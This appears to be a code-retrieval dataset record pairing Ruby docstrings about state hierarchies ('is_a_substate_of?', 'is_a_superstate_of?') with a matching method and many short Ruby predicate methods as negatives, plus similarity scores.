"def ==(x)\n x.class == self.class && @f == x.f && @args == x.args\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def eql?(o)\n o.class == self.class && o.state == state\n end",
"def has_state?\n !@states.empty?\n end",
"def matches_ancestors?(ancestors)\n (ancestors & matching_ancestors).any?\n end",
"def ==(o)\n o.class == self.class && o.state == state\n end",
"def ==(o)\n o.class == self.class && o.state == state\n end",
"def ==(o)\n o.class == self.class && o.state == state\n end",
"def current_state?(x, y, direction)\n @state.current_state?(x, y, direction)\n end",
"def in_state?(path)\n self.find_states(current_state.path).include? find_state(path)\n end",
"def applySupport(x)\n if ((x.minus_state_set.length > 0 || x.plus_state_set.length > 0) && \n x.base_damage == 0 && \n x.hp_recovery == 0 && x.hp_recovery_rate == 0 &&\n x.mp_recovery == 0 && x.mp_recovery_rate == 0) == @value\n return true\n else\n return false\n end\n end",
"def enemy_has_state?(id, s_id)\n # get enemies\n enemies = get_enemies(id)\n # return result\n return (enemies.any? {|e| e.states.include?(s_id)})\n end",
"def == x\n return false unless self.class === x\n @advice == x.advice && @mod == x.mod && @meth == x.meth && @kind == x.kind\n end",
"def active_ship?(ship_obj)\n @active_pos.has_value?(ship_obj)\n end",
"def same?(state)\n map[state] == state || (map[ANY_STATE] == state && from_state == state)\n end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def has_state?(v)\n@state[v]\nend",
"def partial_matched?(node, condition)\n node.child_nodes == node.child_nodes & condition.child_nodes\n end",
"def starts_with? x\r\n self[0..x.size-1] == x\r\n end",
"def in?(x, y)\n check_x = x.between?(self.x, self.x+self.width)\n check_y = y.between?(self.y, self.y+self.height)\n check_x && check_y\n end",
"def == other\n self.class == other.class && self.state == other.state\n end",
"def == other\n self.class == other.class && self.state == other.state\n end",
"def == other\n self.class == other.class && self.state == other.state\n end",
"def sub_branch?\n !root?\n end",
"def matches_ancestors?(ancestors); end",
"def member_of?(team)\n self.team == team\n end",
"def ==(x)\n x.class == self.class && @table == x.table\n end",
"def contained?(other); end",
"def contained?(other); end",
"def contained?(other); end",
"def needs_playing?\n # if either both children are matches and they both need relevant\n # OR\n # both children are players and both are present\n children.count {|child| child.is_a?(Match) ? child.relevant? : child.present?} == 2\n end",
"def ==(other)\n other.class == self.class && other.state == state\n end",
"def solution_for?(puzzle)\n solution? and puzzle.subset?(self)\n end",
"def child_of?(residue)\n residue.residue_composition.include?(self)\n end",
"def current_state?(state)\n state == current_state.to_sym\n end",
"def contains_x(x)\n\t\t@x <= x && x <= (@x + @bg_width)\n\tend",
"def contains(x, y)\n\t\tcontains_x(x) && contains_y(y)\n\tend",
"def has_state(name)\n !@_possible_states[name].nil?\n end",
"def check(type, name, state_to_check)\n key = (make_key(type, name))\n entry = @state[key]\n return entry.state == state_to_check if entry\n false\n end",
"def state_resist?(state_id)\r\n state_resist_set.include?(state_id)\r\n end",
"def state_meets_requirements?\n @needs.each do |requirement|\n valid, reason = state.meets_requirement?(requirement)\n\n unless valid\n logger.debug(\"State does not meet the requirements %s: %s\" % [self, reason])\n return false\n end\n end\n\n true\n end",
"def exists_and_active?\n exists? and active?\n end",
"def washington_state_resident?\n resident == 1 || resident == 2\n end",
"def include?(x)\n inf <= x && x <= sup\n end",
"def has_state?\n !!current_state\n end",
"def sub? name\n @subs.include? name\n end",
"def selected_by_subnav?\n sub_navigation && sub_navigation.selected?\n end",
"def equals(state)\n @buckets == state.buckets &&\n @goal == state.goal\n end",
"def ==(x)\n return false unless x.kind_of?(Element)\n return true if x.object_id == object_id\n return false unless x.tagname_symbol == @tagname\n return false unless x.attrs.size == @attrs.size\n @attrs.each do |a|\n return false unless x[a.key] == a.value\n end\n return false unless x.body == @body\n true\n end",
"def matches_state_attrs?\n @expected_attrs == state_attrs\n end",
"def match?\n source_repo_match? && @build.master_branch?\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def contains?(x, y)\n self_area = triangle_area(@x1, @y1, @x2, @y2, @x3, @y3)\n questioned_area =\n triangle_area(@x1, @y1, @x2, @y2, x, y) +\n triangle_area(@x2, @y2, @x3, @y3, x, y) +\n triangle_area(@x3, @y3, @x1, @y1, x, y)\n\n questioned_area <= self_area\n end",
"def contains?(x, y)\n self_area = triangle_area(@x1, @y1, @x2, @y2, @x3, @y3)\n questioned_area =\n triangle_area(@x1, @y1, @x2, @y2, x, y) +\n triangle_area(@x2, @y2, @x3, @y3, x, y) +\n triangle_area(@x3, @y3, @x1, @y1, x, y)\n\n questioned_area <= self_area\n end",
"def part_of_left_x?(x, y)\n x == y\n end",
"def matches? actual\n super\n\n true === actual || false === actual\n end",
"def x_of_a_kind?(x, c)\n c.group_by(&:value).map { |value, grouping| grouping.count >= x }.any?\n end",
"def child_of?(parent); end",
"def current_stack_match?\n parent_stack = @stack[0..-2]\n\n return false unless dom_stubs[@stack].at_xpath(@xpath)\n\n parent_stack.empty? || !dom_stubs[parent_stack].at_xpath(@xpath)\n end",
"def in?(x, y)\n check_x = x.between?(@x, @x+@width)\n check_y = y.between?(@y, @y+@height)\n check_x && check_y\n end",
"def matches?(klass)\n matching_ancestors.any? { |ancestor| klass <= ancestor }\n end",
"def active?\n @state.active?\n end",
"def relational?\n ancestors.include?(Relational)\n end",
"def current_state?(state) \n\t return state == current_state.to_sym\n\tend",
"def toplevel?\n if Collection.check # When usign multi-species databases\n return true if self == CoordSystem.find_by_rank_and_species_id(1,self.species_id)\n else\n return true if self == CoordSystem.find_by_rank(1) \n end\n return false\n end",
"def state?(type, name)\n @state.key?(make_key(type, name))\n end",
"def accept_state?(state)\n @accept.include? state\n end",
"def end_state?\n not player_alive?(Player1) or not player_alive?(Player2)\n end",
"def in_workflow_state?(test_states = [])\n return false unless state && !test_states.blank?\n\n test_state_regex = test_states.join('|').gsub(/\\s+/, '.+')\n !/#{test_state_regex}/.match(state).nil?\n end",
"def subsume?(other)\n range_within_other?(other,self)\n end",
"def matches?\n # Can't match again if we're inside a match already:\n return false if @matched_depth\n\n match = current_stack_match?\n\n # \"empty element\" matches are yielded immediately, without\n # tagging the stack as having matched, because there won't\n # be an equivalent closing tag to end the match with later.\n if in_empty_element?\n @stack.pop\n elsif match\n @match_depth = @stack.length\n end\n\n match\n end",
"def match?(left, right)\n match(left, right) >= IdentityParade.config.match_score\n end",
"def member?(user)\n user.member?(self)\n end",
"def active?(submodule_name)\n active.select { |s| s[:name].to_s == submodule_name.to_s }.any?\n end",
"def ==(x)\n return true if object_id == x.object_id\n return false unless x.kind_of?(AttrArray)\n each_with_index do |a, n|\n return false unless a == x[n]\n end\n true\n end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def ==(state)\n @buckets == state.buckets &&\n @actions == state.actions &&\n @goal == state.goal\n end",
"def intersects?(subnet)\n includes? subnet.first or includes? subnet.last\n end",
"def operand_matches?(value)\n operand.matches?(value)\n end",
"def is_or_is_ancestor_of?(other)\n (other == self) or is_ancestor_of?(other)\n end",
"def has_siblings?\n return call_ancestry_method(:has_siblings?) if use_ancestry?\n\n relationships.any?(&:has_siblings?)\n end",
"def contains?(target)\n return false if kind == 'state' && target.kind == 'country'\n return false if kind == 'zipcode' && ['country', 'state'].include?(target.kind)\n return false if zone_members.empty? || target.zone_members.empty?\n\n if kind == target.kind\n target.zoneables.each do |target_zoneable|\n return false unless zoneables.include?(target_zoneable)\n end\n elsif target.kind == 'zipcode'\n target.zoneables.each do |target_zip|\n # zips contained in states\n if kind == 'state'\n return false unless zoneables.include?(target_zip.state)\n # zips contained in countries\n elsif kind == 'country'\n return false unless zoneables.include?(target_zip.state.try(:country))\n end\n end\n elsif\n # states contained in countries\n target.zoneables.each do |target_state|\n return false unless zoneables.include?(target_state.country)\n end\n end\n true\nend",
"def member_of?(entity)\n\t\tassociation_exists?(entity, \"membership\", \"joinable\", \"joined\")\n\tend",
"def kind_of?(thing)\n ancestors.include? thing\n end",
"def collide_with_vehicles?(x, y)\r\r\n $game_map.boat.pos_rect_nt?(x, y, collision_rect) || $game_map.ship.pos_rect_nt?(x, y, collision_rect)\r\r\n end",
"def has_conjunction?\n\t\treturn self.num_sublinkages > 1\n\tend"
] |
[
"0.7849539",
"0.69354314",
"0.62772065",
"0.58552575",
"0.5783112",
"0.57808584",
"0.5702207",
"0.5694464",
"0.567237",
"0.5665709",
"0.5665709",
"0.5652542",
"0.56418973",
"0.5599023",
"0.55965835",
"0.5564319",
"0.55438274",
"0.5501651",
"0.54580486",
"0.54479164",
"0.54479164",
"0.54479164",
"0.5444238",
"0.5397645",
"0.53719443",
"0.5367607",
"0.53625196",
"0.5359978",
"0.53519547",
"0.5341296",
"0.5328701",
"0.5319951",
"0.5283515",
"0.5279188",
"0.5268128",
"0.5268128",
"0.5268128",
"0.5247353",
"0.5234869",
"0.52283037",
"0.522453",
"0.5219461",
"0.5219461",
"0.5219461",
"0.5200091",
"0.51886517",
"0.51871586",
"0.5185283",
"0.5177908",
"0.5174361",
"0.5171313",
"0.5167491",
"0.5163009",
"0.5158803",
"0.51557106",
"0.5155424",
"0.5154224",
"0.51391816",
"0.5130363",
"0.51209164",
"0.5119734",
"0.51159525",
"0.5113218",
"0.5102592",
"0.5096077",
"0.5094459",
"0.5093954",
"0.5093954",
"0.50902635",
"0.50849456",
"0.50692236",
"0.50554043",
"0.5054489",
"0.5048936",
"0.50352657",
"0.50348735",
"0.50308585",
"0.50306207",
"0.5024812",
"0.50178415",
"0.5009644",
"0.5006978",
"0.5005169",
"0.49964955",
"0.49877784",
"0.49764118",
"0.49744502",
"0.497211",
"0.49712205",
"0.49707434",
"0.49704254",
"0.49681872",
"0.49633577",
"0.49578413",
"0.49484852",
"0.4944946",
"0.49431446",
"0.49411285",
"0.49389848",
"0.493678"
] |
0.740121
|
1
|
Returns true if this State is a substate of x. All States are substates of themselves.
|
def is_a_substate_of? x
self.ancestors.include?(x)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def is_a_superstate_of? x\n x.ancestors.include?(self)\n end",
"def === x\n # $stderr.puts \"#{self.inspect} === #{x.inspect}\"\n case x\n when self.class\n self.is_a_substate_of?(x)\n else\n super\n end\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def is_sub?\n @sub\n end",
"def sub_branch?\n !root?\n end",
"def contains_x?(x)\n\t\t(self.left..self.right).include?(x);\n\tend",
"def sub? name\n @subs.include? name\n end",
"def in_or_after_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in and after the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def in_or_before_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in or before the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.reverse.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def selected_by_subnav?\n sub_navigation && sub_navigation.selected?\n end",
"def matches_ancestors?(ancestors); end",
"def selected_sub_catgeory?\r\n !session[:selected_sub_catgeory].nil?\r\n end",
"def child_of?(parent); end",
"def has_state?\n !@states.empty?\n end",
"def intersects?(subnet)\n includes? subnet.first or includes? subnet.last\n end",
"def subclients?\n subclients.any?\n end",
"def subsume?(other)\n range_within_other?(other,self)\n end",
"def subconfig? key\n @schema.subconfig? key\n end",
"def subconfig? key\n @validators[String(key).to_sym] == SUBCONFIG\n end",
"def has_conjunction?\n\t\treturn self.num_sublinkages > 1\n\tend",
"def in_state?(path)\n self.find_states(current_state.path).include? find_state(path)\n end",
"def state?(state)\n @state == state\n end",
"def has_siblings?\n return call_ancestry_method(:has_siblings?) if use_ancestry?\n\n relationships.any?(&:has_siblings?)\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def super_and_sub?(sup, sub); end",
"def state?(state)\n @_state == state\n end",
"def ancestors?\n read_attribute(self.ancestry_base_class.ancestry_column).present?\n end",
"def ==(x)\n if !x.is_a?(self.class)\n false\n else\n if empty?\n x.empty?\n else\n !x.empty? && head == x.head && tail == x.tail\n end\n end\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def state?(state)\n @states.key?(state)\n end",
"def child_of?(residue)\n residue.residue_composition.include?(self)\n end",
"def subfolders?\n !self.subfolders.nil?\n end",
"def starts_with? x\r\n self[0..x.size-1] == x\r\n end",
"def sibling_of?(node)\n self.read_attribute(self.ancestry_base_class.ancestry_column) == node.read_attribute(self.ancestry_base_class.ancestry_column)\n end",
"def nested?\n !!state_or_event\n end",
"def has_subnet?(subnet_id_symbol)\n @subnet_ids.key?(subnet_id_symbol)\n end",
"def subdomain_of?(other)\n raise ArgumentError, \"not a domain name: #{other.inspect}\" unless Name === other\n return false if @absolute != other.absolute?\n other_len = other.length\n return false if @labels.length <= other_len\n return @labels[-other_len, other_len] == other.to_a\n end",
"def has_children?\n ( self[:has_children] == 1 )\n end",
"def has_subdomain?(subdomain)\n owned_subdomains.include?(subdomain)\n end",
"def has_submodel?(model)\n each_submodel.any? { |m| m == model }\n end",
"def is_a_subdomain?\n subdomain?\n end",
"def is_subpart?\n case @raw_provider['organization_subpart']\n when 'yes'\n true\n when 'no'\n false\n else\n nil\n end\n end",
"def is_superselector(sup, sub)\n sup = parse_selector(sup, :super)\n sub = parse_selector(sub, :sub)\n bool(sup.superselector?(sub))\n end",
"def contains_subarray?(source, subarray)\n source = Array.wrap(source)\n subarray = Array.wrap(subarray)\n iteration_count = source.length - subarray.length\n 0.upto(iteration_count).any? do |i|\n source[i..(i+subarray.length-1)] == subarray\n end\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def whole_reg?\n size == parent.size\n end",
"def svn?\n is_a?(Subversion) # :-)\n end",
"def toplevel?\n if Collection.check # When usign multi-species databases\n return true if self == CoordSystem.find_by_rank_and_species_id(1,self.species_id)\n else\n return true if self == CoordSystem.find_by_rank(1) \n end\n return false\n end",
"def leaf?(sexp)\n list?(sexp) && depth(sexp) == 1\nend",
"def is_subsequence(s, t)\n t_id = 0\n s_id = 0\n while t_id < t.length && s_id < s.length\n s_id += 1 if t[t_id] == s[s_id]\n t_id += 1\n end\n s_id == s.length\nend",
"def kind_of?(thing)\n ancestors.include? thing\n end",
"def superselector?(seq)\n _superselector?(members, seq.members)\n end",
"def sane_ancestry?\n ancestry.nil? || (ancestry.to_s =~ Ancestry::ANCESTRY_PATTERN && !ancestor_ids.include?(self.id)) \n end",
"def superbalanced?(root)\n terminating_levels = []\n\n nodes_to_check = []\n\n nodes_to_check << [root, 0]\n\n until nodes_to_check.empty?\n current_node, current_level = nodes_to_check[0].first, nodes_to_check.shift.last\n\n if current_node.left || current_node.right\n nodes_to_check << [current_node.left, current_level + 1] if current_node.left\n nodes_to_check << [current_node.right, current_level + 1] if current_node.right\n else\n # if we have found a terminating node, then we must check certain things:\n # if the terminating levels already has 2 elements and\n # this terminating node's current level is distinct, then we short circuit and return false\n # else just continue\n # check whether the current level and the element inside has difference greater than 1\n # if yes, then short circuit and return false\n # else, shovel the current level in and continue\n\n if terminating_levels.length == 2\n return false if !terminating_levels.include?(current_level)\n else\n return false if terminating_levels.length == 1 && !(terminating_levels.first - current_level).between?(-1, 1)\n terminating_levels << current_level if terminating_levels.first != current_level\n end\n end\n end\n\n true\nend",
"def sub_menu?\n items && (items.empty? ? false : true)\n end",
"def subTagOf?(iOtherTag)\n rFound = false\n\n lCheckTag = @Parent\n while (lCheckTag != nil)\n if (lCheckTag == iOtherTag)\n rFound = true\n break\n end\n lCheckTag = lCheckTag.Parent\n end\n\n return rFound\n end",
"def in_subform?(column, parent_record)\r\n return true unless column.association\r\n\r\n # Polymorphic associations can't appear because they *might* be the reverse association, and because you generally don't assign an association from the polymorphic side ... I think.\r\n return false if column.polymorphic_association?\r\n\r\n # We don't have the UI to currently handle habtm in subforms\r\n return false if column.association.macro == :has_and_belongs_to_many\r\n\r\n # A column shouldn't be in the subform if it's the reverse association to the parent\r\n return false if column.association.reverse_for?(parent_record.class)\r\n #return false if column.association.klass == parent_record.class\r\n\r\n return true\r\n end",
"def subnets?\n get_subnet_or_subnets\n end",
"def in_subform?(column, parent_record, parent_column)\n return true unless column.association\n\n if column.association.reverse.nil?\n # Polymorphic associations can't appear because they *might* be the reverse association\n return false if column.association.polymorphic?\n\n # A column shouldn't be in the subform if it's the reverse association to the parent\n !column.association.inverse_for?(parent_record.class)\n elsif column.association.reverse == parent_column.name\n if column.association.polymorphic?\n column.association.name != parent_column.association.as\n else\n !column.association.inverse_for?(parent_record.class)\n end\n else\n true\n end\n end",
"def isComposite\n ! ! @submachine\n end",
"def binary?\n ancestors.include?(Operator::Binary)\n end",
"def can_subsample?\n if self.points < SUBSAMPLE_THRESHOLDS.min || self.subsampled\n false\n else\n # check if there are any data arrays belonging to this cluster that have a subsample threshold & annotation\n !self.find_subsampled_data_arrays.any?\n end\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?\n !!current_state\n end",
"def is_child_of?(_parent)\n return false if (self == _parent) or self.root?\n _parent == self.parent\n end",
"def relational?\n ancestors.include?(Relational)\n end",
"def contained?(other); end",
"def contained?(other); end",
"def contained?(other); end",
"def is_or_is_ancestor_of?(other)\n other == self || is_ancestor_of?(other)\n end",
"def could_be_subsecond?(subsecond); end",
"def child_of?(parent)\n self.class.child?(type, parent)\n end",
"def has_child?\n !@children.empty?\n end",
"def has_children?\n !leaf?\n end",
"def is_child?\n !is_parent?\n end",
"def is_or_is_ancestor_of?(other)\n (other == self) or is_ancestor_of?(other)\n end",
"def has_children?\n !self.children.empty?\n end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def handle_subelement?(object, sub_feature_key)\n true\n end",
"def include?(x)\n inf <= x && x <= sup\n end",
"def children?\n self.children.any?\n end",
"def has_ancestor_taxon_id( ancestor_id )\n return true if id == ancestor_id\n return false if ancestry.blank?\n\n !!ancestry.match( %r{(^|/)#{ancestor_id}(/|$)} )\n end",
"def active?(submodule_name)\n active.select { |s| s[:name].to_s == submodule_name.to_s }.any?\n end",
"def matches_ancestors?(ancestors)\n (ancestors & matching_ancestors).any?\n end",
"def enemy_has_state?(id, s_id)\n # get enemies\n enemies = get_enemies(id)\n # return result\n return (enemies.any? {|e| e.states.include?(s_id)})\n end",
"def running?\n @child && @child.running?\n end",
"def is_subtree(root, sub_root)\n subroot_traversal = recursive_inorder_traversal(sub_root)\n\n is_subtree_recursive(root, subroot_traversal)[0]\nend",
"def superselector?(cseq)\n cseq.members.all? {|seq1| members.any? {|seq2| seq2.superselector?(seq1)}}\n end",
"def has_children?\n self.children.size > 0\n end",
"def has_children?\n self.children.size > 0\n end",
"def has_children?\n self.children.size > 0\n end"
] |
[
"0.7557768",
"0.70673037",
"0.6455087",
"0.5892427",
"0.5886137",
"0.57861155",
"0.5657961",
"0.5624698",
"0.5515374",
"0.54992735",
"0.54143417",
"0.5406614",
"0.53588253",
"0.5335014",
"0.5286561",
"0.52826935",
"0.52713877",
"0.52675635",
"0.5247119",
"0.52331185",
"0.5232019",
"0.52235836",
"0.522025",
"0.5218496",
"0.5212086",
"0.520609",
"0.51651764",
"0.5163283",
"0.5161517",
"0.5160318",
"0.5141057",
"0.51395446",
"0.5129441",
"0.5124942",
"0.5115346",
"0.5110814",
"0.5107705",
"0.50908643",
"0.50790244",
"0.50760096",
"0.5056381",
"0.505107",
"0.5040794",
"0.50358826",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.5030243",
"0.500538",
"0.50011796",
"0.49938372",
"0.49902466",
"0.49745598",
"0.49691513",
"0.49666786",
"0.49661088",
"0.49523064",
"0.49501556",
"0.49494645",
"0.4946251",
"0.49443477",
"0.4937216",
"0.4935386",
"0.4932227",
"0.4931202",
"0.4931202",
"0.49280164",
"0.49267375",
"0.49211302",
"0.49106696",
"0.49106696",
"0.49106696",
"0.49085468",
"0.4902627",
"0.49012798",
"0.48954463",
"0.48953807",
"0.4893212",
"0.48896202",
"0.4886416",
"0.48849243",
"0.4878733",
"0.48778558",
"0.4876078",
"0.48753482",
"0.48742172",
"0.48719656",
"0.48687932",
"0.4866657",
"0.48659262",
"0.48657724",
"0.48581696",
"0.48581696",
"0.48581696"
] |
0.8677874
|
0
|
Returns true if this State is a superstate of x. All States are superstates of themselves.
|
def is_a_superstate_of? x
x.ancestors.include?(self)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def is_a_substate_of? x\n self.ancestors.include?(x)\n end",
"def === x\n # $stderr.puts \"#{self.inspect} === #{x.inspect}\"\n case x\n when self.class\n self.is_a_substate_of?(x)\n else\n super\n end\n end",
"def super_and_sub?(sup, sub); end",
"def is_superselector(sup, sub)\n sup = parse_selector(sup, :super)\n sub = parse_selector(sub, :sub)\n bool(sup.superselector?(sub))\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def is_super?\n state = false\n roles.each do |role|\n state = true if role.name.eql?(ENV['SUPER_N'] || ENV['SUPER_C']) && user_roles.find_by(role_id: role.id, active: true)\n end\n state\n end",
"def super?\n logged_in? && current_user.super\n end",
"def unary?\n ancestors.include?(Operator::Unary)\n end",
"def is_superuser?\n superuser? && supermode?\n end",
"def superset?(other_set)\n requires_set(other_set, __method__)\n other_set.subset?(self)\n end",
"def super?\n group_name == 'super'\n end",
"def ancestors?\n read_attribute(self.ancestry_base_class.ancestry_column).present?\n end",
"def superset?(set)\n self.all? { |val| set.include?(val) }\n end",
"def sub_branch?\n !root?\n end",
"def proper_superset?(set)\n return self != set && superset?(set) if set.is_a?(IntegerSet)\n set.is_a?(Set) or raise ArgumentError, \"value must be a set\"\n return false if size <= set.size\n set.all? { |o| include?(o) }\n end",
"def is_supervisor?\n not under_supervision_clinics.empty?\n end",
"def proper_superset?(set)\n set.is_a?(Set) or raise ArgumentError, \"value must be a set\"\n return false if size <= set.size\n set.all? { |o| include?(o) }\n end",
"def <= (t)\n self == t || t.is_super_of?(self)\n end",
"def superset?(superset_path: superset_path, set_path: set_path)\n if set_path.empty?\n true\n else\n if superset_path.empty?\n false\n else\n if superset_path.first_name == set_path.first_name\n partitions_of_subset(superset_path.first_name).superset?(superset_path: superset_path.rest_names, set_path: set_path.rest_names)\n else\n false\n end\n end\n end\n end",
"def is_superior_to?(product)\n if product && product.is_subscription? && self.is_subscription?\n if self.is_flat? && product.is_flat?\n return false\n elsif self.is_flat? && !product.is_flat?\n return true\n elsif self.contacts.to_i != 0 && product.is_flat?\n return false\n elsif self.contacts.to_i > product.contacts.to_i\n return true\n end\n elsif self.is_subscription? && product.nil?\n return true\n end\n false\n end",
"def superset?(set)\n set.is_a?(Set) or raise ArgumentError, \"value must be a set\"\n return false if size < set.size\n set.all? { |o| include?(o) }\n end",
"def average_roles_has_super_user?\n return self.roles_as(:identifiers).include?(AverageRoles.configuration.super_user) unless AverageRoles.configuration.super_user == nil\n return false\n end",
"def is_superuser?(*args)\n\t\t\tself.role_names.include?('superuser')\n\t\tend",
"def in_or_before_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in or before the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.reverse.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def starts_with? x\r\n self[0..x.size-1] == x\r\n end",
"def sister?(node)\n self.parent == node.parent &&\n node.sister == self\n end",
"def superselector?(seq)\n _superselector?(members, seq.members)\n end",
"def valid?\n return false if !super\n true\n end",
"def superuser?\n member_of_group?(\"Superusers\")\n end",
"def superselector?(cseq)\n cseq.members.all? {|seq1| members.any? {|seq2| seq2.superselector?(seq1)}}\n end",
"def matches_ancestors?(ancestors); end",
"def superset_of?( other_collection )\n other.all? {|e| self.include? e }\n end",
"def is_superuser?(*args)\n\t\tself.role_names.include?('superuser')\n\tend",
"def authorized_to_act_as_superuser?\n member_of? Ddr::Auth.superuser_group\n end",
"def include?(x)\n inf <= x && x <= sup\n end",
"def is_or_is_ancestor_of?(other)\n other == self || is_ancestor_of?(other)\n end",
"def subsume?(other)\n range_within_other?(other,self)\n end",
"def superset?(set)\n case\n when set.instance_of?(self.class) && @hash.respond_to?(:>=)\n @hash >= set.instance_variable_get(:@hash)\n when set.is_a?(Set)\n size >= set.size && set.all? { |o| include?(o) }\n else\n raise ArgumentError, \"value must be a set\"\n end\n end",
"def is_or_is_ancestor_of?(other)\n (other == self) or is_ancestor_of?(other)\n end",
"def has_state?\n !@states.empty?\n end",
"def superbalanced?(root)\n terminating_levels = []\n\n nodes_to_check = []\n\n nodes_to_check << [root, 0]\n\n until nodes_to_check.empty?\n current_node, current_level = nodes_to_check[0].first, nodes_to_check.shift.last\n\n if current_node.left || current_node.right\n nodes_to_check << [current_node.left, current_level + 1] if current_node.left\n nodes_to_check << [current_node.right, current_level + 1] if current_node.right\n else\n # if we have found a terminating node, then we must check certain things:\n # if the terminating levels already has 2 elements and\n # this terminating node's current level is distinct, then we short circuit and return false\n # else just continue\n # check whether the current level and the element inside has difference greater than 1\n # if yes, then short circuit and return false\n # else, shovel the current level in and continue\n\n if terminating_levels.length == 2\n return false if !terminating_levels.include?(current_level)\n else\n return false if terminating_levels.length == 1 && !(terminating_levels.first - current_level).between?(-1, 1)\n terminating_levels << current_level if terminating_levels.first != current_level\n end\n end\n end\n\n true\nend",
"def contains_x?(x)\n\t\t(self.left..self.right).include?(x);\n\tend",
"def superset?(set)\n return (~@val & set.to_i) == 0 if set.is_a?(IntegerSet)\n set.is_a?(Set) or raise ArgumentError, \"value must be a set\"\n return false if size < set.size\n set.all? { |o| include?(o) }\n end",
"def has_state?\n !!current_state\n end",
"def state?(state)\n @_state == state\n end",
"def is_sub?\n @sub\n end",
"def start_state?\n @state_type == :start\n end",
"def invalid_superset?\n invalid = false\n self.traverse do |key_path, value|\n expected = schema.ref(key_path)\n invalid = invalid || !expected\n end\n invalid\n end",
"def is_parent_or_future_instance?\n return !self.over? || self.is_parent?\n end",
"def ancestors\n @ancestors ||=\n begin\n x = [ self ]\n if ss = superstate\n x.push(*ss.ancestors)\n end\n NamedArray.new(x.freeze, :state)\n end\n end",
"def proper_superset?(set)\n case\n when set.instance_of?(self.class) && @hash.respond_to?(:>)\n @hash > set.instance_variable_get(:@hash)\n when set.is_a?(Set)\n size > set.size && set.all? { |o| include?(o) }\n else\n raise ArgumentError, \"value must be a set\"\n end\n end",
"def sibling_of?(node)\n self.read_attribute(self.ancestry_base_class.ancestry_column) == node.read_attribute(self.ancestry_base_class.ancestry_column)\n end",
"def state?(state)\n @state == state\n end",
"def is_super_admin?\n ((!user_group_id.nil?) && has_permission(:is_super_admin))\n end",
"def whole_reg?\n size == parent.size\n end",
"def xa?\n self.state == :xa\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def child_of?(parent); end",
"def superShiny?\n return self.superHue.is_a?(Numeric) ? true : false\n end",
"def superShiny?\n return self.superHue.is_a?(Numeric) ? true : false\n end",
"def final_situation?(sit)\n (super(sit) and sit.stack.empty?) ? true : false\n end",
"def super_user? \n current_user.role.role == \"Super\" \n end",
"def top_level?\n top_level == self\n end",
"def non_relational?\n ancestors.include?(NonRelational)\n end",
"def teacher_is_super( teacher)\n teacher == Teacher.first\n end",
"def is_super_user?\n @super_user\n end",
"def base?\n if self.base != nil\n true\n else\n false\n end\n end",
"def superuser?\n env && env.key?(\"warden\") && env[\"warden\"].authenticate?(scope: :superuser)\n end",
"def state?(state)\n @states.key?(state)\n end",
"def toplevel?\n if Collection.check # When usign multi-species databases\n return true if self == CoordSystem.find_by_rank_and_species_id(1,self.species_id)\n else\n return true if self == CoordSystem.find_by_rank(1) \n end\n return false\n end",
"def super_user?\n super_user\n end",
"def superShiny?\n return self.pokemon && self.pokemon.superShiny?\n end",
"def superior_to?(folder)\n @location.superior_to?(folder.location)\n end",
"def is_base?\n base_quantities.size == 1 &&\n @base_quantity_hash[base_quantities.first] == 1 ? true : false\n end",
"def base_class?\n base_class == self\n end",
"def enotsup?() super; end",
"def is_first_segment_of_flight?\n return true if sibling_segments.empty?\n sibling_segments.sort_by {|segment| segment.index }.first == self\n end",
"def lowest_level?\n !children.any? {|child| child.kind_of?(NonLeafNode)}\n end",
"def binary?\n ancestors.include?(Operator::Binary)\n end",
"def degenerate?\n inf == sup\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def in_state?(path)\n self.find_states(current_state.path).include? find_state(path)\n end",
"def is_ancestor_of?(other)\n other[tree_path_field].include?(self._id)\n end",
"def relational?\n ancestors.include?(Relational)\n end",
"def has_siblings?\n return call_ancestry_method(:has_siblings?) if use_ancestry?\n\n relationships.any?(&:has_siblings?)\n end",
"def sane_ancestry?\n ancestry.nil? || (ancestry.to_s =~ Ancestry::ANCESTRY_PATTERN && !ancestor_ids.include?(self.id)) \n end",
"def is_or_is_sibling_of?(other)\n (other == self) or is_sibling_of?(other)\n end",
"def steady_state?(state)\n STATES[state] >= STEADY_STATE_THRESHOLD\n end",
